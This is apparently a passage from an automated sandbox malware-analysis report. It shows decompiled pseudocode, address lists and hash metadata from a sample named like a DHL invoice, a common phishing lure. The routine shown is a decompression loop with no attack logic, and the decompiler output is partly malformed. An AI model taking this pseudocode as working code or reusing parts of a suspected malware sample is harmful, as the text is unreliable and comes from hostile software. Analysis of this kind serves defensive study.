                                        							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                        							__eax =  *(__ebp - 0x58);
                                        							__esi = __edx + __eax;
                                        							 *(__ebp - 0x54) = __esi;
                                        							__ax =  *__esi;
                                        							__edi = __ax & 0x0000ffff;
                                        							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                        							__eflags =  *(__ebp - 0xc) - __ecx;
                                        							if( *(__ebp - 0xc) >= __ecx) {
                                        								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                        								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                        								__cx = __ax;
                                        								__cx = __ax >> 5;
                                        								__eax = __eax - __ecx;
                                        								__edx = __edx + 1;
                                        								__eflags = __edx;
                                        								 *__esi = __ax;
                                        								 *(__ebp - 0x50) = __edx;
                                        							} else {
                                        								 *(__ebp - 0x10) = __ecx;
                                        								0x800 = 0x800 - __edi;
                                        								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                        								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                        								 *__esi = __cx;
                                        							}
                                        							__eflags =  *(__ebp - 0x10) - 0x1000000;
                                        							if( *(__ebp - 0x10) >= 0x1000000) {
                                        								goto L148;
                                        							} else {
                                        								goto L146;
                                        							}
                                        						case 0x19:
                                        							__eflags = __ebx - 4;
                                        							if(__ebx < 4) {
                                        								 *(__ebp - 0x2c) = __ebx;
                                        								L119:
                                        								_t393 = __ebp - 0x2c;
                                        								 *_t393 =  *(__ebp - 0x2c) + 1;
                                        								__eflags =  *_t393;
                                        								L120:
                                        								__eax =  *(__ebp - 0x2c);
                                        								__eflags = __eax;
                                        								if(__eax == 0) {
                                        									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                        									goto L170;
                                        								}
                                        								__eflags = __eax -  *(__ebp - 0x60);
                                        								if(__eax >  *(__ebp - 0x60)) {
                                        									goto L171;
                                        								}
                                        								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                        								__eax =  *(__ebp - 0x30);
                                        								_t400 = __ebp - 0x60;
                                        								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                        								__eflags =  *_t400;
                                        								goto L123;
                                        							}
                                        							__ecx = __ebx;
                                        							__eax = __ebx;
                                        							__ecx = __ebx >> 1;
                                        							__eax = __ebx & 0x00000001;
                                        							__ecx = (__ebx >> 1) - 1;
                                        							__al = __al | 0x00000002;
                                        							__eax = (__ebx & 0x00000001) << __cl;
                                        							__eflags = __ebx - 0xe;
                                        							 *(__ebp - 0x2c) = __eax;
                                        							if(__ebx >= 0xe) {
                                        								__ebx = 0;
                                        								 *(__ebp - 0x48) = __ecx;
                                        								L102:
                                        								__eflags =  *(__ebp - 0x48);
                                        								if( *(__ebp - 0x48) <= 0) {
                                        									__eax = __eax + __ebx;
                                        									 *(__ebp - 0x40) = 4;
                                        									 *(__ebp - 0x2c) = __eax;
                                        									__eax =  *(__ebp - 4);
                                        									__eax =  *(__ebp - 4) + 0x644;
                                        									__eflags = __eax;
                                        									L108:
                                        									__ebx = 0;
                                        									 *(__ebp - 0x58) = __eax;
                                        									 *(__ebp - 0x50) = 1;
                                        									 *(__ebp - 0x44) = 0;
                                        									 *(__ebp - 0x48) = 0;
                                        									L112:
                                        									__eax =  *(__ebp - 0x40);
                                        									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                        									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                        										_t391 = __ebp - 0x2c;
                                        										 *_t391 =  *(__ebp - 0x2c) + __ebx;
                                        										__eflags =  *_t391;
                                        										goto L119;
                                        									}
                                        									__eax =  *(__ebp - 0x50);
                                        									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                        									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                        									__eax =  *(__ebp - 0x58);
                                        									__esi = __edi + __eax;
                                        									 *(__ebp - 0x54) = __esi;
                                        									__ax =  *__esi;
                                        									__ecx = __ax & 0x0000ffff;
                                        									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                        									__eflags =  *(__ebp - 0xc) - __edx;
                                        									if( *(__ebp - 0xc) >= __edx) {
                                        										__ecx = 0;
                                        										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                        										__ecx = 1;
                                        										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                        										__ebx = 1;
                                        										__ecx =  *(__ebp - 0x48);
                                        										__ebx = 1 << __cl;
                                        										__ecx = 1 << __cl;
                                        										__ebx =  *(__ebp - 0x44);
                                        										__ebx =  *(__ebp - 0x44) | __ecx;
                                        										__cx = __ax;
                                        										__cx = __ax >> 5;
                                        										__eax = __eax - __ecx;
                                        										__edi = __edi + 1;
                                        										__eflags = __edi;
                                        										 *(__ebp - 0x44) = __ebx;
                                        										 *__esi = __ax;
                                        										 *(__ebp - 0x50) = __edi;
                                        									} else {
                                        										 *(__ebp - 0x10) = __edx;
                                        										0x800 = 0x800 - __ecx;
                                        										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                        										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                        										 *__esi = __dx;
                                        									}
                                        									__eflags =  *(__ebp - 0x10) - 0x1000000;
                                        									if( *(__ebp - 0x10) >= 0x1000000) {
                                        										L111:
                                        										_t368 = __ebp - 0x48;
                                        										 *_t368 =  *(__ebp - 0x48) + 1;
                                        										__eflags =  *_t368;
                                        										goto L112;
                                        									} else {
                                        										goto L109;
                                        									}
                                        								}
                                        								__ecx =  *(__ebp - 0xc);
                                        								__ebx = __ebx + __ebx;
                                        								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                        								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                        								 *(__ebp - 0x44) = __ebx;
                                        								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                        									__ecx =  *(__ebp - 0x10);
                                        									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                        									__ebx = __ebx | 0x00000001;
                                        									__eflags = __ebx;
                                        									 *(__ebp - 0x44) = __ebx;
                                        								}
                                        								__eflags =  *(__ebp - 0x10) - 0x1000000;
                                        								if( *(__ebp - 0x10) >= 0x1000000) {
                                        									L101:
                                        									_t338 = __ebp - 0x48;
                                        									 *_t338 =  *(__ebp - 0x48) - 1;
                                        									__eflags =  *_t338;
                                        									goto L102;
                                        								} else {
                                        									goto L99;
                                        								}
                                        							}
                                        							__edx =  *(__ebp - 4);
                                        							__eax = __eax - __ebx;
                                        							 *(__ebp - 0x40) = __ecx;
                                        							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                        							goto L108;
                                        						case 0x1a:
                                        							L56:
                                        							__eflags =  *(__ebp - 0x64);
                                        							if( *(__ebp - 0x64) == 0) {
                                        								 *(__ebp - 0x88) = 0x1a;
                                        								goto L170;
                                        							}
                                        							__ecx =  *(__ebp - 0x68);
                                        							__al =  *(__ebp - 0x5c);
                                        							__edx =  *(__ebp - 8);
                                        							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                        							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                        							 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                        							 *( *(__ebp - 0x68)) = __al;
                                        							__ecx =  *(__ebp - 0x14);
                                        							 *(__ecx +  *(__ebp - 8)) = __al;
                                        							__eax = __ecx + 1;
                                        							__edx = 0;
                                        							_t192 = __eax %  *(__ebp - 0x74);
                                        							__eax = __eax /  *(__ebp - 0x74);
                                        							__edx = _t192;
                                        							goto L79;
                                        						case 0x1b:
                                        							goto L75;
                                        						case 0x1c:
                                        							while(1) {
                                        								L123:
                                        								__eflags =  *(__ebp - 0x64);
                                        								if( *(__ebp - 0x64) == 0) {
                                        									break;
                                        								}
                                        								__eax =  *(__ebp - 0x14);
                                        								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                        								__eflags = __eax -  *(__ebp - 0x74);
                                        								if(__eax >=  *(__ebp - 0x74)) {
                                        									__eax = __eax +  *(__ebp - 0x74);
                                        									__eflags = __eax;
                                        								}
                                        								__edx =  *(__ebp - 8);
                                        								__cl =  *(__eax + __edx);
                                        								__eax =  *(__ebp - 0x14);
                                        								 *(__ebp - 0x5c) = __cl;
                                        								 *(__eax + __edx) = __cl;
                                        								__eax = __eax + 1;
                                        								__edx = 0;
                                        								_t414 = __eax %  *(__ebp - 0x74);
                                        								__eax = __eax /  *(__ebp - 0x74);
                                        								__edx = _t414;
                                        								__eax =  *(__ebp - 0x68);
                                        								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                        								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                        								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                        								__eflags =  *(__ebp - 0x30);
                                        								 *( *(__ebp - 0x68)) = __cl;
                                        								 *(__ebp - 0x14) = _t414;
                                        								if( *(__ebp - 0x30) > 0) {
                                        									continue;
                                        								} else {
                                        									goto L80;
                                        								}
                                        							}
                                        							 *(__ebp - 0x88) = 0x1c;
                                        							goto L170;
                                        					}
                                        				}
                                        			}













                                        0x00000000
                                        0x004069b2
                                        0x004069b2
                                        0x004069b6
                                        0x00406a6d
                                        0x00406a70
                                        0x00406a7c
                                        0x0040695d
                                        0x0040695d
                                        0x00406960
                                        0x00406cd2
                                        0x00406cd2
                                        0x00406cd5
                                        0x00406cd5
                                        0x00406cdb
                                        0x00406ce1
                                        0x00406ce7
                                        0x00406d01
                                        0x00406d04
                                        0x00406d0a
                                        0x00406d15
                                        0x00406d17
                                        0x00406ce9
                                        0x00406ce9
                                        0x00406cf8
                                        0x00406cfc
                                        0x00406cfc
                                        0x00406d21
                                        0x00406d48
                                        0x00406d48
                                        0x00406d4e
                                        0x00406d4e
                                        0x00000000
                                        0x00406d23
                                        0x00406d23
                                        0x00406d27
                                        0x00406ed6
                                        0x00000000
                                        0x00406ed6
                                        0x00406d33
                                        0x00406d3a
                                        0x00406d42
                                        0x00406d45
                                        0x00000000
                                        0x00406d45
                                        0x004069bc
                                        0x004069c0
                                        0x00406f01
                                        0x00406f01
                                        0x00406f04
                                        0x00406f08
                                        0x00406f08
                                        0x004069c6
                                        0x004069cc
                                        0x004069cf
                                        0x004069d3
                                        0x004069d6
                                        0x004069da
                                        0x00406ea0
                                        0x00406eec
                                        0x00406ef4
                                        0x00406efb
                                        0x00406efd
                                        0x00000000
                                        0x00406efd
                                        0x004069e0
                                        0x004069e3
                                        0x004069e9
                                        0x004069eb
                                        0x004069eb
                                        0x004069ee
                                        0x004069f1
                                        0x004069f4
                                        0x004069f7
                                        0x004069fa
                                        0x004069fd
                                        0x004069fe
                                        0x00406a00
                                        0x00406a00
                                        0x00406a00
                                        0x00406a03
                                        0x00406a06
                                        0x00406a09
                                        0x00406a0c
                                        0x00406a0c
                                        0x00406a0f
                                        0x00406a11
                                        0x00406a11
                                        0x00406a14
                                        0x00406a14
                                        0x00406a14
                                        0x004064ea
                                        0x004064ea
                                        0x004064f3
                                        0x00000000
                                        0x00000000
                                        0x004064f9
                                        0x00000000
                                        0x00406504
                                        0x00000000
                                        0x00000000
                                        0x0040650d
                                        0x00406510
                                        0x00406513
                                        0x00406517
                                        0x00000000
                                        0x00000000
                                        0x0040651d
                                        0x00406520
                                        0x00406522
                                        0x00406523
                                        0x00406526
                                        0x00406528
                                        0x00406529
                                        0x0040652b
                                        0x0040652e
                                        0x00406533
                                        0x00406538
                                        0x00406541
                                        0x00406554
                                        0x00406557
                                        0x00406563
                                        0x0040658b
                                        0x0040658d
                                        0x0040659b
                                        0x0040659b
                                        0x0040659f
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0040658f
                                        0x0040658f
                                        0x00406592
                                        0x00406593
                                        0x00406593
                                        0x00000000
                                        0x0040658f
                                        0x00406569
                                        0x0040656e
                                        0x0040656e
                                        0x00406577
                                        0x0040657f
                                        0x00406582
                                        0x00000000
                                        0x00406588
                                        0x00406588
                                        0x00000000
                                        0x00406588
                                        0x00000000
                                        0x004065a5
                                        0x004065a5
                                        0x004065a9
                                        0x00406e55
                                        0x00000000
                                        0x00406e55
                                        0x004065b2
                                        0x004065c2
                                        0x004065c5
                                        0x004065c8
                                        0x004065c8
                                        0x004065c8
                                        0x004065cb
                                        0x004065cf
                                        0x00000000
                                        0x00000000
                                        0x004065d1
                                        0x004065d7
                                        0x00406601
                                        0x00406607
                                        0x0040660e
                                        0x00000000
                                        0x0040660e
                                        0x004065dd
                                        0x004065e0
                                        0x004065e5
                                        0x004065e5
                                        0x004065f0
                                        0x004065f8
                                        0x004065fb
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00406640
                                        0x00406646
                                        0x00406649
                                        0x00406656
                                        0x0040665e
                                        0x00000000
                                        0x00000000
                                        0x00406615
                                        0x00406615
                                        0x00406619
                                        0x00406e64
                                        0x00000000
                                        0x00406e64
                                        0x00406625
                                        0x00406630
                                        0x00406630
                                        0x00406630
                                        0x00406633
                                        0x00406636
                                        0x00406639
                                        0x0040663e
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00406666
                                        0x00406668
                                        0x0040666b
                                        0x004066dc
                                        0x004066df
                                        0x004066e2
                                        0x004066e9
                                        0x004066f3
                                        0x00000000
                                        0x004066f3
                                        0x0040666d
                                        0x00406671
                                        0x00406674
                                        0x00406676
                                        0x00406679
                                        0x0040667c
                                        0x0040667e
                                        0x00406681
                                        0x00406683
                                        0x00406688
                                        0x0040668b
                                        0x0040668e
                                        0x00406692
                                        0x00406699
                                        0x0040669c
                                        0x004066a3
                                        0x004066a7
                                        0x004066af
                                        0x004066af
                                        0x004066af
                                        0x004066a9
                                        0x004066a9
                                        0x004066a9
                                        0x0040669e
                                        0x0040669e
                                        0x0040669e
                                        0x004066b3
                                        0x004066b6
                                        0x004066d4
                                        0x004066d6
                                        0x00000000
                                        0x004066b8
                                        0x004066b8
                                        0x004066bb
                                        0x004066be
                                        0x004066c1
                                        0x004066c3
                                        0x004066c3
                                        0x004066c3
                                        0x004066c6
                                        0x004066c9
                                        0x004066cb
                                        0x004066cc
                                        0x004066cf
                                        0x00000000
                                        0x004066cf
                                        0x00000000
                                        0x00406905
                                        0x00406909
                                        0x00406927
                                        0x0040692a
                                        0x00406931
                                        0x00406934
                                        0x00406937
                                        0x0040693a
                                        0x0040693d
                                        0x00406940
                                        0x00406942
                                        0x00406949
                                        0x0040694a
                                        0x0040694c
                                        0x0040694f
                                        0x00406952
                                        0x00406955
                                        0x00406955
                                        0x0040695a
                                        0x00000000
                                        0x0040695a
                                        0x0040690b
                                        0x0040690e
                                        0x00406911
                                        0x0040691b
                                        0x00000000
                                        0x00000000
                                        0x0040696f
                                        0x00406973
                                        0x00406996
                                        0x00406999
                                        0x0040699c
                                        0x004069a6
                                        0x00406975
                                        0x00406975
                                        0x00406978
                                        0x0040697b
                                        0x0040697e
                                        0x0040698b
                                        0x0040698e
                                        0x0040698e
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00406a23
                                        0x00406a27
                                        0x00406a2e
                                        0x00406a31
                                        0x00406a34
                                        0x00406a3e
                                        0x00000000
                                        0x00406a3e
                                        0x00406a29
                                        0x00000000
                                        0x00000000
                                        0x00406a4a
                                        0x00406a4e
                                        0x00406a55
                                        0x00406a58
                                        0x00406a5b
                                        0x00406a50
                                        0x00406a50
                                        0x00406a50
                                        0x00406a5e
                                        0x00406a61
                                        0x00406a64
                                        0x00406a64
                                        0x00406a67
                                        0x00406a6a
                                        0x00000000
                                        0x00000000
                                        0x00406b0a
                                        0x00406b0a
                                        0x00406b0e
                                        0x00406eac
                                        0x00000000
                                        0x00406eac
                                        0x00406b14
                                        0x00406b17
                                        0x00406b1a
                                        0x00406b1e
                                        0x00406b21
                                        0x00406b27
                                        0x00406b29
                                        0x00406b29
                                        0x00406b29
                                        0x00406b2c
                                        0x00406b2f
                                        0x00000000
                                        0x00000000
                                        0x004066ff
                                        0x004066ff
                                        0x00406703
                                        0x00406e70
                                        0x00000000
                                        0x00406e70
                                        0x00406709
                                        0x0040670c
                                        0x0040670f
                                        0x00406713
                                        0x00406716
                                        0x0040671c
                                        0x0040671e
                                        0x0040671e
                                        0x0040671e
                                        0x00406721
                                        0x00406724
                                        0x00406724
                                        0x00406727
                                        0x0040672a
                                        0x00000000
                                        0x00000000
                                        0x00406730
                                        0x00406736
                                        0x00000000
                                        0x00000000
                                        0x0040673c
                                        0x0040673c
                                        0x00406740
                                        0x00406743
                                        0x00406746
                                        0x00406749
                                        0x0040674c
                                        0x0040674d
                                        0x00406750
                                        0x00406752
                                        0x00406758
                                        0x0040675b
                                        0x0040675e
                                        0x00406761
                                        0x00406764
                                        0x00406767
                                        0x0040676a
                                        0x00406786
                                        0x00406789
                                        0x0040678c
                                        0x0040678f
                                        0x00406796
                                        0x0040679a
                                        0x0040679c
                                        0x004067a0
                                        0x0040676c
                                        0x0040676c
                                        0x00406770
                                        0x00406778
                                        0x0040677d
                                        0x0040677f
                                        0x00406781
                                        0x00406781
                                        0x004067a3
                                        0x004067aa
                                        0x004067ad
                                        0x00000000
                                        0x004067b3
                                        0x00000000
                                        0x004067b3
                                        0x00000000
                                        0x004067b8
                                        0x004067b8
                                        0x004067bc
                                        0x00406e7c
                                        0x00000000
                                        0x00406e7c
                                        0x004067c2
                                        0x004067c5
                                        0x004067c8
                                        0x004067cc
                                        0x004067cf
                                        0x004067d5
                                        0x004067d7
                                        0x004067d7
                                        0x004067d7
                                        0x004067da
                                        0x004067dd
                                        0x004067dd
                                        0x004067dd
                                        0x004067e3
                                        0x00000000
                                        0x00000000
                                        0x004067e5
                                        0x004067e8
                                        0x004067eb
                                        0x004067ee
                                        0x004067f1
                                        0x004067f4
                                        0x004067f7
                                        0x004067fa
                                        0x004067fd
                                        0x00406800
                                        0x00406803
                                        0x0040681b
                                        0x0040681e
                                        0x00406821
                                        0x00406824
                                        0x00406824
                                        0x00406827
                                        0x0040682b
                                        0x0040682d
                                        0x00406805
                                        0x00406805
                                        0x0040680d
                                        0x00406812
                                        0x00406814
                                        0x00406816
                                        0x00406816
                                        0x00406830
                                        0x00406837
                                        0x0040683a
                                        0x00000000
                                        0x0040683c
                                        0x00000000
                                        0x0040683c
                                        0x0040683a
                                        0x00406841
                                        0x00406841
                                        0x00406841
                                        0x00406841
                                        0x00000000
                                        0x00000000
                                        0x0040687c
                                        0x0040687c
                                        0x00406880
                                        0x00406e88
                                        0x00000000
                                        0x00406e88
                                        0x00406886
                                        0x00406889
                                        0x0040688c
                                        0x00406890
                                        0x00406893
                                        0x00406899
                                        0x0040689b
                                        0x0040689b
                                        0x0040689b
                                        0x0040689e
                                        0x004068a1
                                        0x004068a1
                                        0x004068a7
                                        0x00406845
                                        0x00406845
                                        0x00406848
                                        0x00000000
                                        0x00406848
                                        0x004068a9
                                        0x004068a9
                                        0x004068ac
                                        0x004068af
                                        0x004068b2
                                        0x004068b5
                                        0x004068b8
                                        0x004068bb
                                        0x004068be
                                        0x004068c1
                                        0x004068c4
                                        0x004068c7
                                        0x004068df
                                        0x004068e2
                                        0x004068e5
                                        0x004068e8
                                        0x004068e8
                                        0x004068eb
                                        0x004068ef
                                        0x004068f1
                                        0x004068c9
                                        0x004068c9
                                        0x004068d1
                                        0x004068d6
                                        0x004068d8
                                        0x004068da
                                        0x004068da
                                        0x004068f4
                                        0x004068fb
                                        0x004068fe
                                        0x00000000
                                        0x00406900
                                        0x00000000
                                        0x00406900
                                        0x00000000
                                        0x00406b8d
                                        0x00406b8d
                                        0x00406b91
                                        0x00406eb8
                                        0x00000000
                                        0x00406eb8
                                        0x00406b97
                                        0x00406b9a
                                        0x00406b9d
                                        0x00406ba1
                                        0x00406ba4
                                        0x00406baa
                                        0x00406bac
                                        0x00406bac
                                        0x00406bac
                                        0x00406baf
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00406c9c
                                        0x00406ca0
                                        0x00406cc2
                                        0x00406cc5
                                        0x00406ccf
                                        0x00000000
                                        0x00406ccf
                                        0x00406ca2
                                        0x00406ca5
                                        0x00406ca9
                                        0x00406cac
                                        0x00406cac
                                        0x00406caf
                                        0x00000000
                                        0x00000000
                                        0x00406d59
                                        0x00406d5d
                                        0x00406d7b
                                        0x00406d7b
                                        0x00406d7b
                                        0x00406d82
                                        0x00406d89
                                        0x00406d90
                                        0x00406d90
                                        0x00000000
                                        0x00406d90
                                        0x00406d5f
                                        0x00406d62
                                        0x00406d65
                                        0x00406d68
                                        0x00406d6f
                                        0x00406cb3
                                        0x00406cb3
                                        0x00406cb6
                                        0x00000000
                                        0x00000000
                                        0x00406e4a
                                        0x00406e4d
                                        0x00000000
                                        0x00000000
                                        0x00406a84
                                        0x00406a86
                                        0x00406a8d
                                        0x00406a8e
                                        0x00406a90
                                        0x00406a93
                                        0x00000000
                                        0x00000000
                                        0x00406a9b
                                        0x00406a9e
                                        0x00406aa1
                                        0x00406aa3
                                        0x00406aa5
                                        0x00406aa5
                                        0x00406aa6
                                        0x00406aa9
                                        0x00406ab0
                                        0x00406ab3
                                        0x00406ac1
                                        0x00000000
                                        0x00000000
                                        0x00406d97
                                        0x00406d97
                                        0x00406d9a
                                        0x00406da1
                                        0x00000000
                                        0x00000000
                                        0x00406da6
                                        0x00406da6
                                        0x00406daa
                                        0x00406ee2
                                        0x00000000
                                        0x00406ee2
                                        0x00406db0
                                        0x00406db3
                                        0x00406db6
                                        0x00406dba
                                        0x00406dbd
                                        0x00406dc3
                                        0x00406dc5
                                        0x00406dc5
                                        0x00406dc5
                                        0x00406dc8
                                        0x00406dcb
                                        0x00406dcb
                                        0x00406dcb
                                        0x00406dcb
                                        0x00406dce
                                        0x00406dce
                                        0x00406dd2
                                        0x00406e32
                                        0x00406e35
                                        0x00406e3a
                                        0x00406e3b
                                        0x00406e3d
                                        0x00406e3f
                                        0x00406e42
                                        0x00000000
                                        0x00406e42
                                        0x00406dd4
                                        0x00406dda
                                        0x00406ddd
                                        0x00406de0
                                        0x00406de3
                                        0x00406de6
                                        0x00406de9
                                        0x00406dec
                                        0x00406def
                                        0x00406df2
                                        0x00406df5
                                        0x00406e0e
                                        0x00406e11
                                        0x00406e14
                                        0x00406e17
                                        0x00406e1b
                                        0x00406e1d
                                        0x00406e1d
                                        0x00406e1e
                                        0x00406e21
                                        0x00406df7
                                        0x00406df7
                                        0x00406dff
                                        0x00406e04
                                        0x00406e06
                                        0x00406e09
                                        0x00406e09
                                        0x00406e24
                                        0x00406e2b
                                        0x00000000
                                        0x00406e2d
                                        0x00000000
                                        0x00406e2d
                                        0x00000000
                                        0x00406ac9
                                        0x00406acc
                                        0x00406b02
                                        0x00406c32
                                        0x00406c32
                                        0x00406c32
                                        0x00406c32
                                        0x00406c35
                                        0x00406c35
                                        0x00406c38
                                        0x00406c3a
                                        0x00406ec4
                                        0x00000000
                                        0x00406ec4
                                        0x00406c40
                                        0x00406c43
                                        0x00000000
                                        0x00000000
                                        0x00406c49
                                        0x00406c4d
                                        0x00406c50
                                        0x00406c50
                                        0x00406c50
                                        0x00000000
                                        0x00406c50
                                        0x00406ace
                                        0x00406ad0
                                        0x00406ad2
                                        0x00406ad4
                                        0x00406ad7
                                        0x00406ad8
                                        0x00406ada
                                        0x00406adc
                                        0x00406adf
                                        0x00406ae2
                                        0x00406af8
                                        0x00406afd
                                        0x00406b35
                                        0x00406b35
                                        0x00406b39
                                        0x00406b65
                                        0x00406b67
                                        0x00406b6e
                                        0x00406b71
                                        0x00406b74
                                        0x00406b74
                                        0x00406b79
                                        0x00406b79
                                        0x00406b7b
                                        0x00406b7e
                                        0x00406b85
                                        0x00406b88
                                        0x00406bb5
                                        0x00406bb5
                                        0x00406bb8
                                        0x00406bbb
                                        0x00406c2f
                                        0x00406c2f
                                        0x00406c2f
                                        0x00000000
                                        0x00406c2f
                                        0x00406bbd
                                        0x00406bc3
                                        0x00406bc6
                                        0x00406bc9
                                        0x00406bcc
                                        0x00406bcf
                                        0x00406bd2
                                        0x00406bd5
                                        0x00406bd8
                                        0x00406bdb
                                        0x00406bde
                                        0x00406bf7
                                        0x00406bf9
                                        0x00406bfc
                                        0x00406bfd
                                        0x00406c00
                                        0x00406c02
                                        0x00406c05
                                        0x00406c07
                                        0x00406c09
                                        0x00406c0c
                                        0x00406c0e
                                        0x00406c11
                                        0x00406c15
                                        0x00406c17
                                        0x00406c17
                                        0x00406c18
                                        0x00406c1b
                                        0x00406c1e
                                        0x00406be0
                                        0x00406be0
                                        0x00406be8
                                        0x00406bed
                                        0x00406bef
                                        0x00406bf2
                                        0x00406bf2
                                        0x00406c21
                                        0x00406c28
                                        0x00406bb2
                                        0x00406bb2
                                        0x00406bb2
                                        0x00406bb2
                                        0x00000000
                                        0x00406c2a
                                        0x00000000
                                        0x00406c2a
                                        0x00406c28
                                        0x00406b3b
                                        0x00406b3e
                                        0x00406b40
                                        0x00406b43
                                        0x00406b46
                                        0x00406b49
                                        0x00406b4b
                                        0x00406b4e
                                        0x00406b51
                                        0x00406b51
                                        0x00406b54
                                        0x00406b54
                                        0x00406b57
                                        0x00406b5e
                                        0x00406b32
                                        0x00406b32
                                        0x00406b32
                                        0x00406b32
                                        0x00000000
                                        0x00406b60
                                        0x00000000
                                        0x00406b60
                                        0x00406b5e
                                        0x00406ae4
                                        0x00406ae7
                                        0x00406ae9
                                        0x00406aec
                                        0x00000000
                                        0x00000000
                                        0x0040684b
                                        0x0040684b
                                        0x0040684f
                                        0x00406e94
                                        0x00000000
                                        0x00406e94
                                        0x00406855
                                        0x00406858
                                        0x0040685b
                                        0x0040685e
                                        0x00406861
                                        0x00406864
                                        0x00406867
                                        0x00406869
                                        0x0040686c
                                        0x0040686f
                                        0x00406872
                                        0x00406874
                                        0x00406874
                                        0x00406874
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00406c53
                                        0x00406c53
                                        0x00406c53
                                        0x00406c57
                                        0x00000000
                                        0x00000000
                                        0x00406c5d
                                        0x00406c60
                                        0x00406c63
                                        0x00406c66
                                        0x00406c68
                                        0x00406c68
                                        0x00406c68
                                        0x00406c6b
                                        0x00406c6e
                                        0x00406c71
                                        0x00406c74
                                        0x00406c77
                                        0x00406c7a
                                        0x00406c7b
                                        0x00406c7d
                                        0x00406c7d
                                        0x00406c7d
                                        0x00406c80
                                        0x00406c83
                                        0x00406c86
                                        0x00406c89
                                        0x00406c8c
                                        0x00406c90
                                        0x00406c92
                                        0x00406c95
                                        0x00000000
                                        0x00406c97
                                        0x00000000
                                        0x00406c97
                                        0x00406c95
                                        0x00406eca
                                        0x00000000
                                        0x00000000
                                        0x004064f9

                                        Memory Dump Source
                                        • Source File: 00000000.00000002.779143547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.779109785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779195988.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.780430316.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.780430316.0000000000439000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_DHLINV000156.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1a29bcf112b88c1b93ae01eb1cff818f8e5d0edf1da40eda35da1d05f3be857d
                                        • Instruction ID: f9b0e14a80994b8e3cce9b061f2e265d206a391058c15f1564a8a9ac8da356b6
                                        • Opcode Fuzzy Hash: 1a29bcf112b88c1b93ae01eb1cff818f8e5d0edf1da40eda35da1d05f3be857d
                                        • Instruction Fuzzy Hash: 80814571D04229DFDF24CFA8C8847ADBBB1FB44305F25816AD816BB281C7789A96DF44
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 98%
                                        			E004064B7(void* __ecx) {
                                        				void* _v8;
                                        				void* _v12;
                                        				signed int _v16;
                                        				unsigned int _v20;
                                        				signed int _v24;
                                        				signed int _v28;
                                        				signed int _v32;
                                        				signed int _v36;
                                        				signed int _v40;
                                        				signed int _v44;
                                        				signed int _v48;
                                        				signed int _v52;
                                        				signed int _v56;
                                        				signed int _v60;
                                        				signed int _v64;
                                        				signed int _v68;
                                        				signed int _v72;
                                        				signed int _v76;
                                        				signed int _v80;
                                        				signed int _v84;
                                        				signed int _v88;
                                        				signed int _v92;
                                        				signed int _v95;
                                        				signed int _v96;
                                        				signed int _v100;
                                        				signed int _v104;
                                        				signed int _v108;
                                        				signed int _v112;
                                        				signed int _v116;
                                        				signed int _v120;
                                        				intOrPtr _v124;
